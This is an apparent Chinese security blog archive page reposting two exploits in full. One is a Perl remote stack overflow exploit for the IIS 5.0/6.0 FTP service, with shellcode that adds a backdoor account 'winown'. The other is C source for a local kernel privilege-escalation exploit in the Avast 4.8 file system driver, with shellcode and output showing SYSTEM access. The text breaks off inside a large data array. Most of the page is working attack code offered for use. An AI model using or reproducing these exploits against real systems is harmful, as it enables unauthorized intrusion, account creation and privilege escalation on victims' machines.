分类 "网络安全" 的存档.

微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞

      Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
      微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞(win2k)

      现在用win2k跑IIS5.0/6.0的服务器估计不多了,2003是主流。
      这个漏洞代码的终极目的是在系统中建立一个以"winown"为用户名,"nwoniw"为密码的账户。
      此漏洞在Windows 2000 SP4上测试通过,影响带有堆栈cookie保护功能的IIS6程序。

复制内容到剪贴板程序代码程序代码
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

# milw0rm.com [2009-08-31]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/98

Avast! 4.8.1335 专业版本地核心缓冲区溢出漏洞

      Avast! 4.8.1335 专业版文件系统过滤驱动存在本地核心缓冲区溢出漏洞,此漏洞允许入侵者在Windows平台下用受限用户账户获取系统权限。

复制内容到剪贴板程序代码程序代码
#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>

/*
Program          : avast! 4.8.1335 Professionnel
Homepage         : http://www.avast.com
Discovery        : 2009/07/29
Author Contacted : 2009/07/31
Found by         : Heurs
This Advisory    : Heurs
Contact          : heurs@ghostsinthstack.org

//—– Application description

avast! antivirus software represents complete virus protection,
offering full desktop security including a resident shield.
This antivirus is certified by both ICSA Labs and West Coast
Labs Checkmark.

//—– Description of vulnerability

The File System Filter driver is prone to a local kernel buffer overflow.
This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
system from a limited user account.

//—– Proof Of Concept

http://www.sysdream.com/LocalEscalation_Avast.rar

//—– Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//—– Greetings

Virtualabs

//—–Exploitation

###############################################
Avast Kernel Buffer Overflow Vulnerability
Proof Of Concept…

===> Found : LocalEscalation_Avast.exe : 2676

Shellcode PID Uploaded !
Shellcode Redirect Uploaded !
Shellcode Stack Uploaded !
Connecting…    Found !
Handle : 0000001C
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\eleve\Bureau>whoami
SYSTEM
###############################################
*/

char UpdateAswMon [] = {
       0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00,
       0x00, 0x00, 0x00
   };

char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

int GetPidByName(char * name_Proc) {
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;
    
    PEntry.dwSize = sizeof(PROCESSENTRY32);
    hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hTool32 == INVALID_HANDLE_VALUE) {
                printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
                getch();
                exit(0);
                }
    if(!Process32First(hTool32, &PEntry)) {
                                printf("\nError ==> Process32First(hTool32, &PEntry)");
                                getch();
                                exit(0);
                                }
    if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
       printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
       return PEntry.th32ProcessID;
    }
    //printf(   "\n               Process  :  PID\n");
    while(Process32Next(hTool32, &PEntry) != 0){
        if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
                                       CloseHandle(hTool32);
                                       printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
                                       return PEntry.th32ProcessID;
                                       }
        //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID);
    }
    printf("\n%s n'a pas ete trouve.", name_Proc);
    getch();
    exit(0);
}

void MajShellcode(char * ProcessName){
 &nb
sp;   DWORD ProcessID;
     DWORD MagicWord = 0x41414141;
     int i;
    
     ProcessID = GetPidByName(ProcessName);
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) ProcessID & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
            printf("Shellcode PID Uploaded !\n");
            return;
         }
     }
     printf("Shellcode PID NOT Uploaded :\'(\n");
     return;
}

void MajRealShellcode(){
     int i;
     DWORD MagicWord = 0x11111111;
    
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) &RealShellcode & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) &RealShellcode & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = (
(
DWORD) &RealShellcode & 0xFF000000) >> 24;
            printf("Shellcode Redirect Uploaded !\n");
            return;
         }
     }
     printf("Shellcode Redirect NOT Uploaded :\'(\n");
     return;
}

int FindStack(){
     __asm__(
       "mov %eax, %esp\n\t"
       "leave\n\t"
       "ret\n\t"
       );
}

void MajRealStack(){
     int i;
     DWORD MagicWord = 0x22222222;
     DWORD StackLocation = FindStack();
    
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) &StackLocation & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) &StackLocation & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
            printf("Shellcode Stack Uploaded !\n");
            return;
         }
     }
     printf("Shellcode NOT Uploaded :\'(\n");
     return;
}

void AfficherListeFichiers(void) {
    HANDLE hFind;
    WIN32_FIND_DATAW FindData;
    char Dossier[1024];
    
    // Change de dossier
    SetCurrentDirectory(Dossier);
    
    // DÈbut de la recherche
    hFind=FindFirstFileW(L"*.*", &FindData);
    if (hFind!=INVALID_HANDLE_VALUE)
    {
        // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom
        printf("%ws\n",FindData.cFileName);
        // Fichiers suivants
        while (FindNextFileW(hFind, &FindData))
        {
            printf("%ws\n",FindData.cFileName);
        }
    }
    // Fin de la recherche
    FindClose(hFind);
}

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD InitVal=0;
    char welcome[1024], out[50];
    DWORD Crashing []={
        0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72,
        0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
        0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
        0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
        0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
        0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
        0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
        0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
        0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
        0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
        0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
        0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
        0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
        0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
        0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
        0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
        0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7,
        0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
        0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8,
        0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
        0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
        0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
        0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
        0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
        0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
        0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
        0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
        0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
        0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
        0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
        0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
        0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
        0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
        0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
        0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
        0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
        0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
        0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
        0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
        0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
        0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
        0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
        0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
        0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
        0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
        0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2,
        0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
        0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
        0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
        0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
        0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984,
        0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
        0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
        0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
        0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
        0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
        0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
        0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
        0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
        0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
        0x32685945, 0x55016b49, 0x994f9293, 0x599f9653,
        0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
        0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
        0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
        0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
        0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
        0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c,
        0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10,
        0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7,
        0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636,
        0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
        0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
        0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
        0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
        0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
        0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
        0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
        0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
        0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
        0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
        0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
        0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
        0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
        0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
        0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
        0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
        0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
 &n
bsp;      0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
        0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec,
        0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
        0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
        0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
        0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
        0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
        0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
        0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
        0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
        0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
        0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
        0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
        0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
        0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
        0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776,
        0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
        0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
        0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
        0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
        0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
        0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
        0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
        0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
        0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
        0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
        0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
        0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
        0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
        0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
        0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
        0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
        0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
        0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
      &nb
sp; 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
        0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
        0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
        0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
        0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
        0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
        0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977,
        0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
        0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
        0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
        0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
        0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
        0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd,
        0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
        0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
        0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
        0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84,
        0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
        0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
        0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
        0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
        0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
        0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
        0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
        0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
        0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
        0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
        0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
        0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
        0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
        0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
        0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
        0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
        0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
        0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c,
        0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
        0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
        0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
        0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
        0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069,
        0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
        0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
        0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
        0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529,
        0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
        0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
        0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
        0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
        0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
        0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943,
        0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
        0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
        0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
        0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
        0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
        0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
        0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
        0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
        0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
        0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387,
        0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
        0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
        0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
        0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
        0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
        0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
        0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
        0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
        0x20a8484b, 0x8c08
dd85, 0xc82a0739, 0xed52e038,
        0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
        0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
        0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
        0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
        0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37,
        0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
        0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
        0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
